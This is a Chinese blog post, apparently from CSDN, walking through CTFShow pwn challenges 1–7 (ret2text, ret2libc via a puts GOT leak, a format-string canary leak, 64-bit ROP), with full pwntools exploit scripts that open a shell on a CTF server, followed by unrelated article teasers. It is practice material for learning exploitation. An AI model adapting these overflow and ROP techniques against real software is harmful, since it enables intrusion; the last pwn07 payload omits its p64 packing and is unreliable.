Pwn_CTFShow_01

最新推荐文章于 2024-11-17 11:02:49 发布
最新推荐文章于 2024-11-17 11:02:49 发布
阅读量955 收藏 2
点赞数 1
分类专栏: CTF Pwn 文章标签: python 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/YangZiTrick/article/details/108911375
版权
本文解析了CTF中常见的Pwn挑战,包括签到题、ret2text、栈溢出、Canary绕过等技巧,并详细介绍了如何利用各种漏洞获取shell的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

Pwn_CTFShow

1.PWN签到题

直接 nc

出flag,白给

2.pwn02

ret2text

file 一下
在这里插入图片描述
32bit

IDA分析
在这里插入图片描述
发现 bin/sh 地址

可以用 cyclic生成字符串,然后gdb run一下,再计算出偏移
在这里插入图片描述
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
cyclic -l 0x......
在这里插入图片描述
exp:

from pwn import *

p=remote('111.231.70.44',28042)

payload='a'*13 + p32(0x8048518)

p.sendline(payload)

p.interactive()

3.pwn03

参考博客

checksec一下

32bit 程序
IDA分析
先看main函数
在这里插入图片描述
没有什么线索,再进pwnme函数

在这里插入图片描述
在这里插入图片描述
发现存在一个栈溢出
由于找不到system函数的地址,所以

涉及到plt表和got表
程序执行后,plt表里是got表的地址,got表是函数的真实地址
程序还未执行时,got表里还是plt表的地址
我们需要泄漏got表里的地址,由于开启了ASLR,本地和远程的地址不一样
但也只是针对于地址中间位进行随机,最低的12位并不会发生改变
也就是我们需要获取到远程环境的函数的真实地址
进而判断libc的版本,计算泄漏的函数got表的地址与system的偏移,然后获取到system函数的真实地址,进而计算system函数与/bin/sh的偏移,最终getshell
所以我们首先exp的构造
首先栈溢出,利用puts函数的plt表的地址,泄漏puts函数的got表中的函数的真实地址,然后返回地址填写main函数重新跳转回来

exp:

from pwn import *
#context.log_level = 'debug'

p = remote('111.231.70.44',28063)
#p = process('./stack1')

elf = ELF('./stack1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']

payload = "A"*13 + p32(puts_plt) + p32(main_addr) + p32(puts_got)

p.sendline(payload)

p.recvuntil('\n\n')

get_addr = u32(p.recv(4))

print(hex(get_addr))

输出了puts函数的真实地址
ps:这里要remote过去,否则输出的地址会不一样

在这里插入图片描述

可以通过后三位判断libc的版本
libcSearch

在这里插入图片描述
知道这些信息之后
exp:

from pwn import *
#context.log_level = 'debug'

p = remote('111.231.70.44',28063)
#p = process('./stack1')

elf = ELF('./stack1')
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
main_addr = elf.symbols['main']

payload = "A"*13 + p32(puts_plt) + p32(main_addr) + p32(puts_got)

p.sendline(payload)

p.recvuntil('\n\n')

get_addr = u32(p.recv(4))

print(hex(get_addr))

libcbase = get_addr - 0x067360
system_addr = libcbase + 0x03cd10
bin_sh = libcbase + 0x17b8cf
payload = flat(['A'*13,system_addr,'AAAA',bin_sh])

p.sendline(payload)

p.interactive()

4.pwn04

先checksec
在这里插入图片描述
栈不可执行
Canary打开

canary:
用于防止栈溢出被利用的一种方法,原理是在栈的ebp下面放一个随机数,在函数返回之前会检查这个数有没有被修改,就可以检测是否发生栈溢出。

main函数:
在这里插入图片描述
没有线索,跟进vuln函数

在这里插入图片描述
看到v3就是canary了
也就是下面的 [ebp-0ch]
在这里插入图片描述
在vuln函数中canary赋值给了eax
我们可以通过在这个赋值之后下一个断点,来获取canary的值
在此之前我们需要知道printf函数的地址,用来找到canary的偏移
所以要先在printf函数下面下一个断点
b printf

在这里插入图片描述
run

在这里插入图片描述
可以看到
printf函数的地址是 0xffffd0b0

然后在canary赋值之后下一个断点
ps:在vuln函数和main函数中都有canary的赋值

在这里插入图片描述
在这里插入图片描述

这里需要用main函数里面的(我也不知道为什么。。。
b *0x080486C9

在这里插入图片描述

这样就找到了canary的值
之后看printf的地址,找到canary的值,然后算出偏移
x/40wx 0xffffd0b0
在这里插入图片描述
发现0x0x1276e500的偏移为31,所以构造canary的值为%31$x
canary的值要靠我们的输入buf来赋值,所以要计算一下buf和v3的偏移 = (0x70-0xC) =100
在这里插入图片描述
最后还有 (0x8+4) = 12 个字节需要覆盖,覆盖返回地址到system函数才能取得shell

exp:

from pwn import *

p =remote("111.231.70.44",28017)

p.recv()
leak_canary = "%31$x"
p.sendline(leak_canary)
canary = int(p.recv(),16)

print(hex(canary))

getshell = "a" * 100 + p32(canary) + "b" * 12 + p32(0x0804859B)

p.sendline(getshell)

p.interactive()

5.pwn05

IDA分析一下

在这里插入图片描述
gets函数 明显的溢出
双击s
在这里插入图片描述
偏移为 (0x14+4)
再 Shift+F12
在这里插入图片描述
找到 /bin/sh

在这里插入图片描述
exp:

from pwn import *

p=remote('111.231.70.44',28024)

payload='a'*(0x14+4) + p32(0x08048486)

p.sendline(payload)

p.interactive()

6.pwn06

64位的pwn05
所以和上一题是差不多的
不同的是这里要平衡堆栈
在这里插入图片描述
push rbp :将bp寄存器的值压入栈中
然后再看偏移
在这里插入图片描述
这里32位是4,而64位则是8

exp:

from pwn import *

p=remote('111.231.70.44',28070)

payload='a'*(0xc+8) + p64(0x400577)+ p64(0x400577)

p.sendline(payload)

p.interactive()

7.pwn07

先checksec一下
在这里插入图片描述
这题和pwn03差的不多
pwn03是32bit的,这题是64bit的
64比32需要的payload多了一个pop rdi,ret

32位:
payload:"a"*offset + p32(plt) + p32(ret_addr) + p32(got)
getshell: "a"*offset + p32(system_addr) + "AAAA" + p32(str_bin_sh)
64位:
payload:"a"*offset + p64(pop_rdi) + p64(got) + p64(plt) + p64(ret_addr)
getshell: "a"*offset + p64(ret) + p64(pop_rdi) + p64(str_bin_sh)

ROPgadget --binary [file name]
在这里插入图片描述
在这里插入图片描述

exp:

from pwn import *

context.log_level = 'debug'

context.arch = 'amd64'

#p = process('./pwn')

p = remote('111.231.70.44',28049)

elf = ELF('./pwn')  #产生一个对象

puts_plt = elf.plt['puts']

puts_got = elf.got['puts']

pop_rdi = 0x4006e3 # ROPgadget --binary [file name]

main = elf.symbols['main']  #elf.symbols['a_function']  找到 a_function 的地址

payload = 'a'*20 + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)
#64位payload: "a"*offset + p64(pop_rdi) + p64(got) + p64(plt) + p64(ret_addr/main)

p.sendline(payload)

p.recvuntil('\x0a') #p.recvuntil(some_string) 接收到 some_string 为止

puts_addr = u64(p.recv(6).ljust(8,b'\x00')) #p.recvn(N)   接受 N(数字) 字符

print(hex(puts_addr))

ret_addr = 0x4006E4

libcbase = puts_addr -  0x0809c0    # -libc_Offset的puts

system_addr = libcbase + 0x04f440   # +libc_Offset的system

bin_sh = libcbase + 0x1b3e9a        # +libc_Offset的bin/sh

payload = 'a'*20 + ret_addr + pop_rdi + bin_sh + system_addr
#getshell: b"a"*offset + p64(ret) + p64(pop_rdi) + p64(str_bin_sh)

p.sendline(payload)

p.interactive()
飞腾交叉编译环境搭建之交叉编译工具链配置
04-08
但要注意,这一环境需要经过严格的测试,以确保交叉编译出的程序能在目标平台上稳定运行。测试通常包括单元测试、集成测试和系统测试等,以全面评估交叉编译环境的可靠性。 飞腾交叉编译环境的搭建不仅对开发者提出...
交叉编译QT5.9(包含QWebEngine)
05-11
ARM64下QT需要用到QWebEngine模块,网上很多资源交叉编译QT时,均默认跳过此步骤,没跳过此步骤的很多未能详细提供交叉编译webengine模块所依赖的库,导致此模块无法交叉编译通过,资源中包含了arm64交叉编译...
交叉编译注意事项
逝无痕——kaidy
05-18 2667
交叉编译库时所最常用到的配置 而知,一般编译都是: ./configure xxx make make install 此处,对于./configure的xxx,我最常用的是: ? 1 ./configure --prefix=YOUR_INSTALL_PATH --build=CURRENT_EN
交叉编译中需要注意make的隐晦规则
grandjack520的专栏
02-19 1570
熟悉linux的都知道,GUN 的make工具在生成可执行程序的过程中为我们提供了非常大的便利。不过要写出高效、简洁的Makefile可就不那么容易了(比如像我这样的菜鸟)。偶最近在进一步学习Makefile,就把遇到的问题以及自己的小小心得写出来,需要指正的大家尽管喷^_^ 不罗嗦了,先列出一个案例Makefile: #CXX :=/opt/buildroot-ralink-mt7620/b
如何交叉编译应用程序,技巧,注意事项
aaronychen的专栏
03-18 4138
如何交叉编译应用程序,技巧,注意事项。最近大家都涉及交叉编译应用程序,感觉大家的路子有点偏,觉得有必要纠正一下。 一般的应用程序编译的步骤无外呼 ./configure && make && make install     但是对于交叉编译不能照搬,尤其要注意不能轻易make install(当然如果指定了 --prefix就无所谓了, 否则可能会覆盖标准路径的程序就惨了) 这里有两个思路
交叉编译链环境注意事项以及总结
weixin_30401605的博客
09-22 253
关于移植 移植三要素: 1 源码 2 交叉工具链 3 配置 下面一一说一下。 源码,请在移植前多google其资料,重点说一下,重点用google,不要baidu,保证你省40%的时间,了解其应用以及相关技术(这个很重要啊,因为有时你需要额外安装很多依赖的库,这个过程最好是大量而快速,不要迷恋其中任何技术细节)。 下载...
【嵌入式】详解嵌入式交叉编译指南:Configure、CMake和Makefile方法
科技改变人类,技术成就未来
04-15 2999
详解嵌入式交叉编译指南:Configure、CMake和Makefile方法。在嵌入式开发中,交叉编译开源软件是一个常见的任务,它涉及到将源代码编译成能够在目标嵌入式平台上运行的二进制文件。由于嵌入式平台的硬件架构和操作系统可能与开发机器不同,因此需要使用交叉编译工具链来完成这一任务。本文将详细介绍使用不同构建系统进行交叉编译的方法,并扩充一些注意事项和可能遇到的问题。
ppp2.4.9交叉编译后产生的文件
最新发布
01-09
值得注意的是,这四个文件都与PPP协议的不同方面相关联,而它们的交叉编译版本则表明了为特定硬件环境定制软件的能力。开发者在进行此类编译时,需要确保交叉编译器的版本与目标平台兼容,并且必须对目标平台的特定...
android-arm平台ndk交叉编译python
09-30
这时,我们就需要用到Android NDK(Native Development Kit)进行交叉编译,将Python编译为适用于Android ARM架构的二进制代码。本文将详细讲解如何在Android ARM平台上使用NDK工具进行Python的交叉编译。 首先,...
libjpeg-turbo 交叉编译aarch64 6.5.0 jpeg图像加速库
06-28
《libjpeg-turbo 6.5.0:在aarch64平台上实现JPEG图像加速库的交叉编译详解》 libjpeg-turbo是一个开源的、高效的JPEG图像处理库,它利用SIMD(单指令多数据)指令来提高JPEG编码和解码的速度。6.5.0版本作为其一...
gcc-linaro-6.3.1-2017.02-x86_64_aarch64-linux-gnu.tar.xz
06-14
交叉编译工具链 gcc-linaro-6.3.1-2017.02-x86_64_aarch64-linux-gnu.tar 可以跟我以前上传的QT编译产物搭配使用
cpp-轻量级ARMv8AARM64AArch64LittleEndian用于AndroidCC的嵌入式Hook库
08-16
轻量级ARMv8-A(ARM64,AArch64,Little-Endian)用于Android C/C 的嵌入式Hook库
gcc-arm-none-eabi-10-2020-q2-preview-x86_64-linux.tar.bz2
09-15
This is a preview release for M-profile Vector Extension (MVE) and Custom Datapath Extension (CDE) features, and is not a production release. Please use the GNU Arm Embedded Toolchain 9-2020-q2-update release for production use-cases
linux cmake交叉编译
河图洛书
12-18 1498
linux cmake交叉编译linux cmake交叉编译下载测试添加依赖库如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 linux cmake交叉编译 linux cmake交叉编译,使用环境:ubuntu、cmake、gcc-arm-10.2-2020.11-x8
tensorflow c++ 飞腾平台(linux-aarch64)编译
weixin_37958647的博客
09-09 2068
文章目录 安装交叉编译工具aarch64-liinux-gun 安装bazel 编译tensorflow c++ 进入官网www.linaro.org,根据对应系统的gcc版本下载对应的交叉编译工具(建议选择Binaries版本无需安装) 下载解压。bin目录为gcc的位置,建议添加到系统路径中,在命令行中输入 export PATH=/usr/local/share/gcc-linaro-5.4.1-2017.05-x86_64_aarch64-linux-gnu/bin:$PATH(注意该命令只针对当
如何进行系统移值
sjrhsk_hahaha的博客
11-17 456
1.安装xshell,用于连接单片机串 口,也可以远程连接linux主机。 2.安装交叉编译器 3.安装tftp 4.安装nfs 5.在虚拟机新建一个虚拟网卡,没有 多余网口就买-个usb网卡 6.开发板网络设置 7.插入SD卡,进入单片机的uboot设 置网络 8.下载系统文件 9.设置启动项 就可以启动系统辣
GLIBC更新
帅的没拼音
03-14 1023
最常见的ls命令加载时,操作系统会将控制权交给 ld-linux-armhf.so.3 而不是交给程序正常的进入地址。ld-linux-armhf.so.3 会寻找并且加载所有需要的库文件,然后将控制权交给应用的起始入口。ELF 文件提供了相应的加载信息, GCC包含了一个特殊的 ELF 头: INTERP, 这个 INTERP指定了 加载器的路径,我们可以用readelf 来查看相应的程序。ld-linux-armhf.so.3->ld-2.23.so为动态库加载器。指定安装目录为“/usr/”
交叉编译工具 aarch64-linux-gnu-gcc 的介绍与安装
weixin_49046732的博客
09-08 7497
AArch64 是随 ARMv8 ISA 一起引入的 64 位架构,用于执行 A64 指令的计算机。而且在 AArch64 状态下执行的代码只能使用 A64 指令集。,而不能执行 A32 或 T32 指令。但是,与 AArch32 中不同,在64位状态下,指令可以访问 64 位和 3...
在X86上交叉编译ARM64 linux上的NCNN
dasheng_604的专栏
11-19 6434
1、准备编译器和sysroot环境,下载地址为:https://releases.linaro.org/components/toolchain/binaries/latest/aarch64-linux-gnu/ 编译器是:gcc-linaro-7.1.1-2017.08-x86_64_aarch64-linux-gnu.tar.xzsysroot是:sysroot-glibc-lin
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值